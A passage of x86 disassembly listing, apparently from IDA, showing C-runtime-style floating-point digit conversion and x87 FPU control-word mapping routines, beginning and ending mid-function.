		lea	eax, [ebp+var_3C]
		movsd
		dec	[ebp+var_3C+2]
		mov	[ebp+var_64], eax
		mov	ecx, eax

loc_413270:				; CODE XREF: sub_413071+1EAj
		movzx	edi, word ptr [ecx+0Ah]
		mov	edx, [ebp+var_16]
		xor	eax, eax
		mov	ecx, edi
		mov	esi, 7FFFh
		xor	ecx, edx
		and	edx, esi
		and	edi, esi
		mov	[ebp+var_48], eax
		mov	[ebp+var_10], eax
		mov	[ebp+var_C], eax
		mov	[ebp+var_8], eax
		and	ecx, 8000h
		cmp	dx, si
		lea	eax, [edi+edx]
		movzx	eax, ax
		jnb	loc_4134AA
		cmp	di, si
		jnb	loc_4134AA
		cmp	ax, 0BFFDh
		ja	loc_4134AA
		cmp	ax, 3FBFh
		ja	short loc_4132D0
		xor	eax, eax
		mov	[ebp+var_1A+2],	eax
		mov	[ebp-1Ch], eax
		mov	[ebp+var_20], eax
		jmp	loc_4134C6
; ---------------------------------------------------------------------------

loc_4132D0:				; CODE XREF: sub_413071+24Dj
		xor	esi, esi
		cmp	dx, si
		jnz	short loc_4132F4
		inc	eax
		test	[ebp+var_1A+2],	7FFFFFFFh
		jnz	short loc_4132F4
		cmp	[ebp-1Ch], esi
		jnz	short loc_4132F4
		cmp	[ebp+var_20], esi
		jnz	short loc_4132F4
		mov	word ptr [ebp+var_16], si
		jmp	loc_4134C6
; ---------------------------------------------------------------------------

loc_4132F4:				; CODE XREF: sub_413071+264j
					; sub_413071+26Ej ...
		cmp	di, si
		jnz	short loc_41331D
		mov	edx, [ebp+var_64]
		inc	eax
		test	dword ptr [edx+8], 7FFFFFFFh
		jnz	short loc_41331D
		cmp	[edx+4], esi
		jnz	short loc_41331D
		cmp	[edx], esi
		jnz	short loc_41331D
		mov	[ebp+var_1A+2],	esi
		mov	[ebp-1Ch], esi
		mov	[ebp+var_20], esi
		jmp	loc_4134C6
; ---------------------------------------------------------------------------

loc_41331D:				; CODE XREF: sub_413071+286j
					; sub_413071+293j ...
		lea	edi, [ebp+var_C]
		mov	[ebp+var_5C], esi
		mov	[ebp+var_44], edi
		mov	[ebp+var_40], 5

loc_41332D:				; CODE XREF: sub_413071+332j
		mov	edx, [ebp+var_5C]
		mov	esi, [ebp+var_40]
		add	edx, edx
		test	esi, esi
		mov	[ebp+var_50], esi
		jle	short loc_413394
		lea	edx, [ebp+edx+var_20]
		mov	[ebp+var_58], edx
		mov	edx, [ebp+var_64]
		add	edx, 8
		mov	[ebp+var_54], edx

loc_41334C:				; CODE XREF: sub_413071+321j
		mov	edx, [ebp+var_58]
		mov	esi, [ebp+var_54]
		movzx	esi, word ptr [esi]
		movzx	edx, word ptr [edx]
		mov	edi, [edi-4]
		imul	edx, esi
		and	[ebp+var_70], 0
		lea	esi, [edi+edx]
		cmp	esi, edi
		jb	short loc_41336D
		cmp	esi, edx
		jnb	short loc_413374

loc_41336D:				; CODE XREF: sub_413071+2F6j
		mov	[ebp+var_70], 1

loc_413374:				; CODE XREF: sub_413071+2FAj
		cmp	[ebp+var_70], 0
		mov	edi, [ebp+var_44]
		mov	[edi-4], esi
		jz	short loc_413383
		inc	word ptr [edi]

loc_413383:				; CODE XREF: sub_413071+30Dj
		add	[ebp+var_58], 2
		sub	[ebp+var_54], 2
		dec	[ebp+var_50]
		cmp	[ebp+var_50], 0
		jg	short loc_41334C

loc_413394:				; CODE XREF: sub_413071+2C9j
		inc	edi
		inc	edi
		inc	[ebp+var_5C]
		dec	[ebp+var_40]
		cmp	[ebp+var_40], 0
		mov	[ebp+var_44], edi
		jg	short loc_41332D
		add	eax, 0C002h
		test	ax, ax
		jle	short loc_4133EA

loc_4133AF:				; CODE XREF: sub_413071+372j
		test	[ebp+var_8], 80000000h
		jnz	short loc_4133E5
		mov	edx, [ebp+var_10]
		mov	edi, [ebp+var_C]
		mov	esi, [ebp+var_C]
		shl	[ebp+var_10], 1
		shr	edx, 1Fh
		add	edi, edi
		or	edi, edx
		mov	edx, [ebp+var_8]
		shr	esi, 1Fh
		add	edx, edx
		or	edx, esi
		add	eax, 0FFFFh
		test	ax, ax
		mov	[ebp+var_C], edi
		mov	[ebp+var_8], edx
		jg	short loc_4133AF

loc_4133E5:				; CODE XREF: sub_413071+345j
		test	ax, ax
		jg	short loc_41343C

loc_4133EA:				; CODE XREF: sub_413071+33Cj
		add	eax, 0FFFFh
		test	ax, ax
		jge	short loc_41343C
		mov	edx, eax
		neg	edx
		movzx	edx, dx
		mov	[ebp+var_44], edx
		add	eax, edx

loc_413400:				; CODE XREF: sub_413071+3BEj
		test	byte ptr [ebp+var_10], 1
		jz	short loc_413409
		inc	[ebp+var_48]

loc_413409:				; CODE XREF: sub_413071+393j
		mov	edx, [ebp+var_8]
		mov	edi, [ebp+var_C]
		mov	esi, [ebp+var_C]
		shr	[ebp+var_8], 1
		shl	edx, 1Fh
		shr	edi, 1
		or	edi, edx
		mov	edx, [ebp+var_10]
		shl	esi, 1Fh
		shr	edx, 1
		or	edx, esi
		dec	[ebp+var_44]
		mov	[ebp+var_C], edi
		mov	[ebp+var_10], edx
		jnz	short loc_413400
		cmp	[ebp+var_48], 0
		jz	short loc_41343C
		or	word ptr [ebp+var_10], 1

loc_41343C:				; CODE XREF: sub_413071+377j
					; sub_413071+381j ...
		cmp	word ptr [ebp+var_10], 8000h
		ja	short loc_413455
		mov	edx, [ebp+var_10]
		and	edx, 1FFFFh
		cmp	edx, 18000h
		jnz	short loc_413488

loc_413455:				; CODE XREF: sub_413071+3D1j
		cmp	[ebp+var_10+2],	0FFFFFFFFh
		jnz	short loc_413485
		and	[ebp+var_10+2],	0
		cmp	[ebp+var_C+2], 0FFFFFFFFh
		jnz	short loc_413480
		and	[ebp+var_C+2], 0
		cmp	word ptr [ebp+var_8+2],	0FFFFh
		jnz	short loc_41347A
		mov	word ptr [ebp+var_8+2],	8000h
		inc	eax
		jmp	short loc_413488
; ---------------------------------------------------------------------------

loc_41347A:				; CODE XREF: sub_413071+3FEj
		inc	word ptr [ebp+var_8+2]
		jmp	short loc_413488
; ---------------------------------------------------------------------------

loc_413480:				; CODE XREF: sub_413071+3F2j
		inc	[ebp+var_C+2]
		jmp	short loc_413488
; ---------------------------------------------------------------------------

loc_413485:				; CODE XREF: sub_413071+3E8j
		inc	[ebp+var_10+2]

loc_413488:				; CODE XREF: sub_413071+3E2j
					; sub_413071+407j ...
		cmp	ax, 7FFFh
		jnb	short loc_4134AA
		mov	dx, word ptr [ebp+var_10+2]
		mov	word ptr [ebp+var_20], dx
		mov	edx, [ebp+var_C]
		mov	[ebp+var_20+2],	edx
		mov	edx, [ebp+var_8]
		or	eax, ecx
		mov	[ebp+var_1A], edx
		mov	word ptr [ebp+var_16], ax
		jmp	short loc_4134C6
; ---------------------------------------------------------------------------

loc_4134AA:				; CODE XREF: sub_413071+230j
					; sub_413071+239j ...
		neg	cx
		sbb	ecx, ecx
		and	dword ptr [ebp-1Ch], 0
		and	ecx, 80000000h
		add	ecx, 7FFF8000h
		and	[ebp+var_20], 0
		mov	[ebp+var_1A+2],	ecx

loc_4134C6:				; CODE XREF: sub_413071+1D6j
					; sub_413071+25Aj ...
		test	ebx, ebx
		jnz	loc_413239
		xor	eax, eax

loc_4134D0:				; CODE XREF: sub_413071+1ABj
					; sub_413071+1C2j
		mov	ecx, [ebp+var_1A+2]
		shr	ecx, 10h
		cmp	cx, 3FFFh
		mov	ebx, 7FFFh
		jb	loc_413730
		mov	esi, [ebp+var_28+2]
		inc	[ebp+var_4C]
		movzx	edx, cx
		mov	ecx, esi
		xor	ecx, edx
		and	edx, ebx
		and	esi, ebx
		and	ecx, 8000h
		cmp	dx, bx
		lea	edi, [esi+edx]
		mov	[ebp+var_58], eax
		mov	[ebp+var_10], eax
		mov	[ebp+var_C], eax
		mov	[ebp+var_8], eax
		movzx	edi, di
		jnb	loc_413716
		cmp	si, bx
		jnb	loc_413716
		cmp	di, 0BFFDh
		ja	loc_413716
		cmp	di, 3FBFh
		ja	short loc_41353B

loc_413533:				; CODE XREF: sub_413071+503j
		mov	[ebp+var_1A+2],	eax
		jmp	loc_41372A
; ---------------------------------------------------------------------------

loc_41353B:				; CODE XREF: sub_413071+4C0j
		cmp	dx, ax
		jnz	short loc_41355D
		inc	edi
		test	[ebp+var_1A+2],	7FFFFFFFh
		jnz	short loc_41355D
		cmp	[ebp-1Ch], eax
		jnz	short loc_41355D
		cmp	[ebp+var_20], eax
		jnz	short loc_41355D
		mov	word ptr [ebp+var_16], ax
		jmp	loc_413730
; ---------------------------------------------------------------------------

loc_41355D:				; CODE XREF: sub_413071+4CDj
					; sub_413071+4D7j ...
		cmp	si, ax
		jnz	short loc_413576
		inc	edi
		test	[ebp+var_28], 7FFFFFFFh
		jnz	short loc_413576
		cmp	[ebp+var_2C], eax
		jnz	short loc_413576
		cmp	[ebp+var_30], eax
		jz	short loc_413533

loc_413576:				; CODE XREF: sub_413071+4EFj
					; sub_413071+4F9j ...
		and	[ebp+var_54], 0
		lea	eax, [ebp+var_C]
		mov	[ebp+var_40], 5

loc_413584:				; CODE XREF: sub_413071+580j
		mov	edx, [ebp+var_54]
		mov	esi, [ebp+var_40]
		add	edx, edx
		test	esi, esi
		mov	[ebp+var_50], esi
		jle	short loc_4135E5
		lea	esi, [ebp+var_28]
		lea	edx, [ebp+edx+var_20]
		mov	[ebp+var_5C], esi
		mov	[ebp+var_48], edx

loc_4135A0:				; CODE XREF: sub_413071+572j
		mov	edx, [ebp+var_5C]
		mov	esi, [ebp+var_48]
		movzx	esi, word ptr [esi]
		movzx	edx, word ptr [edx]
		and	[ebp+var_44], 0
		imul	edx, esi
		mov	esi, [eax-4]
		lea	ebx, [esi+edx]
		cmp	ebx, esi
		jb	short loc_4135C1
		cmp	ebx, edx
		jnb	short loc_4135C8

loc_4135C1:				; CODE XREF: sub_413071+54Aj
		mov	[ebp+var_44], 1

loc_4135C8:				; CODE XREF: sub_413071+54Ej
		cmp	[ebp+var_44], 0
		mov	[eax-4], ebx
		jz	short loc_4135D4
		inc	word ptr [eax]

loc_4135D4:				; CODE XREF: sub_413071+55Ej
		add	[ebp+var_48], 2
		sub	[ebp+var_5C], 2
		dec	[ebp+var_50]
		cmp	[ebp+var_50], 0
		jg	short loc_4135A0

loc_4135E5:				; CODE XREF: sub_413071+520j
		inc	eax
		inc	eax
		inc	[ebp+var_54]
		dec	[ebp+var_40]
		cmp	[ebp+var_40], 0
		jg	short loc_413584
		add	edi, 0C002h
		xor	eax, eax
		cmp	di, ax
		jle	short loc_41363C

loc_413600:				; CODE XREF: sub_413071+5C4j
		test	[ebp+var_8], 80000000h
		jnz	short loc_413637
		mov	edx, [ebp+var_10]
		mov	ebx, [ebp+var_C]
		mov	esi, [ebp+var_C]
		shl	[ebp+var_10], 1
		shr	edx, 1Fh
		add	ebx, ebx
		or	ebx, edx
		mov	edx, [ebp+var_8]
		shr	esi, 1Fh
		add	edx, edx
		or	edx, esi
		add	edi, 0FFFFh
		cmp	di, ax
		mov	[ebp+var_C], ebx
		mov	[ebp+var_8], edx
		jg	short loc_413600

loc_413637:				; CODE XREF: sub_413071+596j
		cmp	di, ax
		jg	short loc_41368B

loc_41363C:				; CODE XREF: sub_413071+58Dj
		add	edi, 0FFFFh
		cmp	di, ax
		jge	short loc_41368B
		mov	eax, edi
		neg	eax
		movzx	eax, ax
		add	edi, eax

loc_413650:				; CODE XREF: sub_413071+60Cj
		test	byte ptr [ebp+var_10], 1
		jz	short loc_413659
		inc	[ebp+var_58]

loc_413659:				; CODE XREF: sub_413071+5E3j
		mov	edx, [ebp+var_8]
		mov	ebx, [ebp+var_C]
		mov	esi, [ebp+var_C]
		shr	[ebp+var_8], 1
		shl	edx, 1Fh
		shr	ebx, 1
		or	ebx, edx
		mov	edx, [ebp+var_10]
		shl	esi, 1Fh
		shr	edx, 1
		or	edx, esi
		dec	eax
		mov	[ebp+var_C], ebx
		mov	[ebp+var_10], edx
		jnz	short loc_413650
		xor	eax, eax
		cmp	[ebp+var_58], eax
		jz	short loc_41368B
		or	word ptr [ebp+var_10], 1

loc_41368B:				; CODE XREF: sub_413071+5C9j
					; sub_413071+5D4j ...
		cmp	word ptr [ebp+var_10], 8000h
		ja	short loc_4136A4
		mov	edx, [ebp+var_10]
		and	edx, 1FFFFh
		cmp	edx, 18000h
		jnz	short loc_4136D5

loc_4136A4:				; CODE XREF: sub_413071+620j
		cmp	[ebp+var_10+2],	0FFFFFFFFh
		jnz	short loc_4136D2
		cmp	[ebp+var_C+2], 0FFFFFFFFh
		mov	[ebp+var_10+2],	eax
		jnz	short loc_4136CD
		cmp	word ptr [ebp+var_8+2],	0FFFFh
		mov	[ebp+var_C+2], eax
		jnz	short loc_4136C7
		mov	word ptr [ebp+var_8+2],	8000h
		inc	edi
		jmp	short loc_4136D5
; ---------------------------------------------------------------------------

loc_4136C7:				; CODE XREF: sub_413071+64Bj
		inc	word ptr [ebp+var_8+2]
		jmp	short loc_4136D5
; ---------------------------------------------------------------------------

loc_4136CD:				; CODE XREF: sub_413071+640j
		inc	[ebp+var_C+2]
		jmp	short loc_4136D5
; ---------------------------------------------------------------------------

loc_4136D2:				; CODE XREF: sub_413071+637j
		inc	[ebp+var_10+2]

loc_4136D5:				; CODE XREF: sub_413071+631j
					; sub_413071+654j ...
		cmp	di, 7FFFh
		jb	short loc_4136FA
		neg	cx
		mov	[ebp-1Ch], eax
		mov	[ebp+var_20], eax
		sbb	ecx, ecx
		and	ecx, 80000000h
		add	ecx, 7FFF8000h
		mov	[ebp+var_1A+2],	ecx

loc_4136F6:				; CODE XREF: sub_413071+6A3j
		xor	eax, eax
		jmp	short loc_413730
; ---------------------------------------------------------------------------

loc_4136FA:				; CODE XREF: sub_413071+669j
		mov	ax, word ptr [ebp+var_10+2]
		mov	word ptr [ebp+var_20], ax
		mov	eax, [ebp+var_C]
		mov	[ebp+var_20+2],	eax
		mov	eax, [ebp+var_8]
		or	edi, ecx
		mov	[ebp+var_1A], eax
		mov	word ptr [ebp+var_16], di
		jmp	short loc_4136F6
; ---------------------------------------------------------------------------

loc_413716:				; CODE XREF: sub_413071+4A1j
					; sub_413071+4AAj ...
		neg	cx
		sbb	ecx, ecx
		and	ecx, 80000000h
		add	ecx, 7FFF8000h
		mov	[ebp+var_1A+2],	ecx

loc_41372A:				; CODE XREF: sub_413071+4C5j
		mov	[ebp-1Ch], eax
		mov	[ebp+var_20], eax

loc_413730:				; CODE XREF: sub_413071+46Fj
					; sub_413071+4E7j ...
		test	[ebp+arg_10], 1
		mov	edx, [ebp+var_60]
		mov	ecx, [ebp+var_4C]
		mov	[edx], cx
		jz	short loc_413771
		movsx	ecx, cx
		add	[ebp+arg_C], ecx
		cmp	[ebp+arg_C], eax
		jg	short loc_413771
		and	word ptr [edx],	0
		cmp	word ptr [ebp+var_6C], 8000h
		mov	byte ptr [edx+3], 1
		setnz	al
		dec	al
		and	al, 0Dh
		add	al, 20h
		mov	[edx+2], al
		mov	byte ptr [edx+4], 30h
		mov	byte ptr [edx+5], 0
		jmp	loc_413120
; ---------------------------------------------------------------------------

loc_413771:				; CODE XREF: sub_413071+6CCj
					; sub_413071+6D7j
		push	15h
		pop	ecx
		cmp	[ebp+arg_C], ecx
		jle	short loc_41377C
		mov	[ebp+arg_C], ecx

loc_41377C:				; CODE XREF: sub_413071+706j
		mov	esi, [ebp+var_1A+2]
		shr	esi, 10h
		push	8
		sub	esi, 3FFEh
		mov	word ptr [ebp+var_16], ax
		pop	ebx

loc_41378F:				; CODE XREF: sub_413071+742j
		mov	eax, [ebp+var_20]
		mov	edi, [ebp-1Ch]
		mov	ecx, [ebp-1Ch]
		shl	[ebp+var_20], 1
		shr	eax, 1Fh
		add	edi, edi
		or	edi, eax
		mov	eax, [ebp+var_1A+2]
		shr	ecx, 1Fh
		add	eax, eax
		or	eax, ecx
		dec	ebx
		mov	[ebp-1Ch], edi
		mov	[ebp+var_1A+2],	eax
		jnz	short loc_41378F
		test	esi, esi
		jge	short loc_4137EB
		neg	esi
		and	esi, 0FFh
		jle	short loc_4137EB

loc_4137C3:				; CODE XREF: sub_413071+778j
		mov	eax, [ebp+var_1A+2]
		mov	edi, [ebp-1Ch]
		mov	ecx, [ebp-1Ch]
		shr	[ebp+var_1A+2],	1
		shl	eax, 1Fh
		shr	edi, 1
		or	edi, eax
		mov	eax, [ebp+var_20]
		shl	ecx, 1Fh
		shr	eax, 1
		or	eax, ecx
		dec	esi
		test	esi, esi
		mov	[ebp-1Ch], edi
		mov	[ebp+var_20], eax
		jg	short loc_4137C3

loc_4137EB:				; CODE XREF: sub_413071+746j
					; sub_413071+750j
		mov	eax, [ebp+arg_C]
		inc	eax
		test	eax, eax
		lea	ebx, [edx+4]
		mov	[ebp+var_40], ebx
		mov	[ebp+var_4C], eax
		jle	loc_4138B5

loc_413800:				; CODE XREF: sub_413071+83Ej
		mov	edx, [ebp+var_20]
		mov	eax, [ebp-1Ch]
		lea	esi, [ebp+var_20]
		lea	edi, [ebp+var_3C]
		movsd
		movsd
		movsd
		shl	[ebp+var_20], 1
		mov	edi, [ebp+var_20]
		shl	[ebp+var_20], 1
		shr	edx, 1Fh
		lea	ecx, [eax+eax]
		or	ecx, edx
		mov	edx, [ebp+var_1A+2]
		mov	esi, eax
		shr	esi, 1Fh
		add	edx, edx
		or	edx, esi
		mov	eax, ecx
		lea	esi, [ecx+ecx]
		shr	eax, 1Fh
		lea	ecx, [edx+edx]
		mov	edx, [ebp+var_3C]
		shr	edi, 1Fh
		or	ecx, eax
		mov	eax, [ebp+var_20]
		or	esi, edi
		lea	edi, [edx+eax]
		cmp	edi, eax
		jb	short loc_41384F
		cmp	edi, edx
		jnb	short loc_413867

loc_41384F:				; CODE XREF: sub_413071+7D8j
		lea	eax, [esi+1]
		xor	edx, edx
		cmp	eax, esi
		jb	short loc_41385D
		cmp	eax, 1
		jnb	short loc_413860

loc_41385D:				; CODE XREF: sub_413071+7E5j
		xor	edx, edx
		inc	edx

loc_413860:				; CODE XREF: sub_413071+7EAj
		test	edx, edx
		mov	esi, eax
		jz	short loc_413867
		inc	ecx

loc_413867:				; CODE XREF: sub_413071+7DCj
					; sub_413071+7F3j
		mov	eax, [ebp+var_38]
		lea	edx, [eax+esi]
		cmp	edx, esi
		mov	[ebp+var_44], edx
		jb	short loc_413878
		cmp	edx, eax
		jnb	short loc_413879

loc_413878:				; CODE XREF: sub_413071+801j
		inc	ecx

loc_413879:				; CODE XREF: sub_413071+805j
		add	ecx, [ebp+var_34]
		shr	edx, 1Fh
		add	ecx, ecx
		or	ecx, edx
		lea	esi, [edi+edi]
		mov	[ebp+var_20], esi
		mov	esi, [ebp+var_44]
		mov	[ebp+var_1A+2],	ecx
		shr	ecx, 18h
		add	esi, esi
		add	cl, 30h
		mov	eax, edi
		shr	eax, 1Fh
		or	esi, eax
		mov	[ebx], cl
		inc	ebx
		dec	[ebp+var_4C]
		cmp	[ebp+var_4C], 0
		mov	[ebp-1Ch], esi
		mov	byte ptr [ebp+var_16+1], 0
		jg	loc_413800

loc_4138B5:				; CODE XREF: sub_413071+789j
		dec	ebx
		mov	al, [ebx]
		dec	ebx
		cmp	al, 35h
		jge	short loc_4138CB
		mov	ecx, [ebp+var_40]
		jmp	short loc_413906
; ---------------------------------------------------------------------------

loc_4138C2:				; CODE XREF: sub_413071+85Dj
		cmp	byte ptr [ebx],	39h
		jnz	short loc_4138D0
		mov	byte ptr [ebx],	30h
		dec	ebx

loc_4138CB:				; CODE XREF: sub_413071+84Aj
		cmp	ebx, [ebp+var_40]
		jnb	short loc_4138C2

loc_4138D0:				; CODE XREF: sub_413071+854j
		cmp	ebx, [ebp+var_40]
		mov	eax, [ebp+var_60]
		jnb	short loc_4138DC
		inc	ebx
		inc	word ptr [eax]

loc_4138DC:				; CODE XREF: sub_413071+865j
		inc	byte ptr [ebx]

loc_4138DE:				; CODE XREF: sub_413071+89Ej
		sub	bl, al
		sub	bl, 3
		movsx	ecx, bl
		mov	[eax+3], bl
		mov	byte ptr [ecx+eax+4], 0
		mov	eax, [ebp+var_74]

loc_4138F1:				; CODE XREF: sub_413071+B2j
					; sub_413071+15Bj
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
; ---------------------------------------------------------------------------

loc_413900:				; CODE XREF: sub_413071+897j
		cmp	byte ptr [ebx],	30h
		jnz	short loc_41390A
		dec	ebx

loc_413906:				; CODE XREF: sub_413071+84Fj
		cmp	ebx, ecx
		jnb	short loc_413900

loc_41390A:				; CODE XREF: sub_413071+892j
		cmp	ebx, ecx
		mov	eax, [ebp+var_60]
		jnb	short loc_4138DE
		and	word ptr [eax],	0
		cmp	word ptr [ebp+var_6C], 8000h
		mov	byte ptr [eax+3], 1
		setnz	dl
		dec	dl
		and	dl, 0Dh
		add	dl, 20h
		mov	[eax+2], dl
		mov	byte ptr [ecx],	30h
		mov	byte ptr [eax+5], 0
		jmp	loc_413120
sub_413071	endp


; =============== S U B	R O U T	I N E =======================================



sub_413939	proc near		; CODE XREF: sub_413A67+C0p
		xor	eax, eax
		test	bl, 10h
		jz	short loc_413941
		inc	eax

loc_413941:				; CODE XREF: sub_413939+5j
		test	bl, 8
		jz	short loc_413949
		or	eax, 4

loc_413949:				; CODE XREF: sub_413939+Bj
		test	bl, 4
		jz	short loc_413951
		or	eax, 8

loc_413951:				; CODE XREF: sub_413939+13j
		test	bl, 2
		jz	short loc_413959
		or	eax, 10h

loc_413959:				; CODE XREF: sub_413939+1Bj
		test	bl, 1
		jz	short loc_413961
		or	eax, 20h

loc_413961:				; CODE XREF: sub_413939+23j
		test	ebx, 80000h
		jz	short loc_41396C
		or	eax, 2

loc_41396C:				; CODE XREF: sub_413939+2Ej
		mov	ecx, ebx
		mov	edx, 300h
		and	ecx, edx
		push	esi
		mov	esi, 200h
		jz	short loc_4139A0
		cmp	ecx, 100h
		jz	short loc_41399B
		cmp	ecx, esi
		jz	short loc_413994
		cmp	ecx, edx
		jnz	short loc_4139A0
		or	eax, 0C00h
		jmp	short loc_4139A0
; ---------------------------------------------------------------------------

loc_413994:				; CODE XREF: sub_413939+4Ej
		or	eax, 800h
		jmp	short loc_4139A0
; ---------------------------------------------------------------------------

loc_41399B:				; CODE XREF: sub_413939+4Aj
		or	eax, 400h

loc_4139A0:				; CODE XREF: sub_413939+42j
					; sub_413939+52j ...
		mov	ecx, ebx
		and	ecx, 30000h
		jz	short loc_4139B6
		cmp	ecx, 10000h
		jnz	short loc_4139B8
		or	eax, esi
		jmp	short loc_4139B8
; ---------------------------------------------------------------------------

loc_4139B6:				; CODE XREF: sub_413939+6Fj
		or	eax, edx

loc_4139B8:				; CODE XREF: sub_413939+77j
					; sub_413939+7Bj
		test	ebx, 40000h
		pop	esi
		jz	short locret_4139C6
		or	eax, 1000h

locret_4139C6:				; CODE XREF: sub_413939+86j
		retn
sub_413939	endp


; =============== S U B	R O U T	I N E =======================================



sub_4139C7	proc near		; CODE XREF: sub_413A67:loc_413CA0p
		xor	eax, eax
		test	dl, 10h
		jz	short loc_4139D3
		mov	eax, 80h

loc_4139D3:				; CODE XREF: sub_4139C7+5j
		test	dl, 8
		push	ebx
		push	esi
		push	edi
		mov	ebx, 200h
		jz	short loc_4139E2
		or	eax, ebx

loc_4139E2:				; CODE XREF: sub_4139C7+17j
		test	dl, 4
		jz	short loc_4139EC
		or	eax, 400h

loc_4139EC:				; CODE XREF: sub_4139C7+1Ej
		test	dl, 2
		jz	short loc_4139F6
		or	eax, 800h

loc_4139F6:				; CODE XREF: sub_4139C7+28j
		test	dl, 1
		jz	short loc_413A00
		or	eax, 1000h

loc_413A00:				; CODE XREF: sub_4139C7+32j
		test	edx, 80000h
		mov	edi, 100h
		jz	short loc_413A0F
		or	eax, edi

loc_413A0F:				; CODE XREF: sub_4139C7+44j
		mov	ecx, edx
		mov	esi, 300h
		and	ecx, esi
		jz	short loc_413A39
		cmp	ecx, edi
		jz	short loc_413A34
		cmp	ecx, ebx
		jz	short loc_413A2D
		cmp	ecx, esi
		jnz	short loc_413A39
		or	eax, 6000h
		jmp	short loc_413A39
; ---------------------------------------------------------------------------

loc_413A2D:				; CODE XREF: sub_4139C7+59j
		or	eax, 4000h
		jmp	short loc_413A39
; ---------------------------------------------------------------------------

loc_413A34:				; CODE XREF: sub_4139C7+55j
		or	eax, 2000h

loc_413A39:				; CODE XREF: sub_4139C7+51j
					; sub_4139C7+5Dj ...
		mov	ecx, 3000000h
		pop	edi
		and	edx, ecx
		cmp	edx, 1000000h
		pop	esi
		pop	ebx
		jz	short loc_413A61
		cmp	edx, 2000000h
		jz	short loc_413A5D
		cmp	edx, ecx
		jnz	short locret_413A66
		or	eax, 8000h
		retn
; ---------------------------------------------------------------------------

loc_413A5D:				; CODE XREF: sub_4139C7+8Aj
		or	eax, 40h
		retn
; ---------------------------------------------------------------------------

loc_413A61:				; CODE XREF: sub_4139C7+82j
		or	eax, 8040h

locret_413A66:				; CODE XREF: sub_4139C7+8Ej
		retn
sub_4139C7	endp


; =============== S U B	R O U T	I N E =======================================



sub_413A67	proc near		; CODE XREF: sub_411EBF+25p
					; sub_411EBF+55p ...

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		sub	esp, 10h
		push	ebx
		push	ebp
		push	esi
		push	edi
		fstcw	word ptr [esp+20h+var_C]
		mov	ebx, [esp+20h+var_C]
		xor	edx, edx
		test	bl, 1
		jz	short loc_413A81
		push	10h
		pop	edx

loc_413A81:				; CODE XREF: sub_413A67+15j
		test	bl, 4
		jz	short loc_413A89
		or	edx, 8

loc_413A89:				; CODE XREF: sub_413A67+1Dj
		test	bl, 8
		jz	short loc_413A91
		or	edx, 4

loc_413A91:				; CODE XREF: sub_413A67+25j
		test	bl, 10h
		jz	short loc_413A99
		or	edx, 2

loc_413A99:				; CODE XREF: sub_413A67+2Dj
		test	bl, 20h
		jz	short loc_413AA1
		or	edx, 1

loc_413AA1:				; CODE XREF: sub_413A67+35j
		test	bl, 2
		jz	short loc_413AAC
		or	edx, 80000h

loc_413AAC:				; CODE XREF: sub_413A67+3Dj
		movzx	ecx, bx
		mov	eax, ecx
		mov	edi, 0C00h
		and	eax, edi
		mov	ebp, 300h
		mov	esi, 200h
		jz	short loc_413AE4
		cmp	eax, 400h
		jz	short loc_413ADE
		cmp	eax, 800h
		jz	short loc_413ADA
		cmp	eax, edi
		jnz	short loc_413AE4
		or	edx, ebp
		jmp	short loc_413AE4
; ---------------------------------------------------------------------------

loc_413ADA:				; CODE XREF: sub_413A67+69j
		or	edx, esi
		jmp	short loc_413AE4
; ---------------------------------------------------------------------------

loc_413ADE:				; CODE XREF: sub_413A67+62j
		or	edx, 100h

loc_413AE4:				; CODE XREF: sub_413A67+5Bj
					; sub_413A67+6Dj ...
		and	ecx, ebp
		jz	short loc_413AF4
		cmp	ecx, esi
		jnz	short loc_413AFA
		or	edx, 10000h
		jmp	short loc_413AFA
; ---------------------------------------------------------------------------

loc_413AF4:				; CODE XREF: sub_413A67+7Fj
		or	edx, 20000h

loc_413AFA:				; CODE XREF: sub_413A67+83j
					; sub_413A67+8Bj
		test	bx, 1000h
		jz	short loc_413B07
		or	edx, 40000h

loc_413B07:				; CODE XREF: sub_413A67+98j
		mov	esi, [esp+20h+arg_4]
		mov	ecx, [esp+20h+arg_0]
		mov	eax, esi
		not	eax
		and	eax, edx
		and	ecx, esi
		or	eax, ecx
		cmp	eax, edx
		mov	[esp+20h+var_4], eax
		jz	loc_413BCF
		mov	ebx, eax
		call	sub_413939
		movzx	eax, ax
		mov	[esp+20h+var_10], eax
		fldcw	word ptr [esp+20h+var_10]
		fstcw	word ptr [esp+20h+var_10]
		mov	ebx, [esp+20h+var_10]
		xor	edx, edx
		test	bl, 1
		jz	short loc_413B4A
		push	10h
		pop	edx

loc_413B4A:				; CODE XREF: sub_413A67+DEj
		test	bl, 4
		jz	short loc_413B52
		or	edx, 8

loc_413B52:				; CODE XREF: sub_413A67+E6j
		test	bl, 8
		jz	short loc_413B5A
		or	edx, 4

loc_413B5A:				; CODE XREF: sub_413A67+EEj
		test	bl, 10h
		jz	short loc_413B62
		or	edx, 2

loc_413B62:				; CODE XREF: sub_413A67+F6j
		test	bl, 20h
		jz	short loc_413B6A
		or	edx, 1

loc_413B6A:				; CODE XREF: sub_413A67+FEj
		test	bl, 2
		jz	short loc_413B75
		or	edx, 80000h

loc_413B75:				; CODE XREF: sub_413A67+106j
		movzx	ecx, bx
		mov	eax, ecx
		and	eax, edi
		jz	short loc_413BA2
		cmp	eax, 400h
		jz	short loc_413B9C
		cmp	eax, 800h
		jz	short loc_413B94
		cmp	eax, edi
		jnz	short loc_413BA2
		or	edx, ebp
		jmp	short loc_413BA2
; ---------------------------------------------------------------------------

loc_413B94:				; CODE XREF: sub_413A67+123j
		or	edx, 200h
		jmp	short loc_413BA2
; ---------------------------------------------------------------------------

loc_413B9C:				; CODE XREF: sub_413A67+11Cj
		or	edx, 100h

loc_413BA2:				; CODE XREF: sub_413A67+115j
					; sub_413A67+127j ...
		and	ecx, ebp
		jz	short loc_413BB6
		cmp	ecx, 200h
		jnz	short loc_413BBC
		or	edx, 10000h
		jmp	short loc_413BBC
; ---------------------------------------------------------------------------

loc_413BB6:				; CODE XREF: sub_413A67+13Dj
		or	edx, 20000h

loc_413BBC:				; CODE XREF: sub_413A67+145j
					; sub_413A67+14Dj
		test	bx, 1000h
		jz	short loc_413BC9
		or	edx, 40000h

loc_413BC9:				; CODE XREF: sub_413A67+15Aj
		mov	eax, edx
